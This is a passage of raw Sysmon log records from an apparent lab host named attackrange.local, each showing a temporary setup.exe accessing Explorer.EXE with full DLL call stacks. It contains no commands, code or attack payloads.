\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015285Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015284Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015283Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015282Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015281Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015280Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000015279Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015278Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015277Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000015276Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000015275Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000015274Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015273Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000015272Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000015271Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000015270Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015269Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.505{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000015268Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 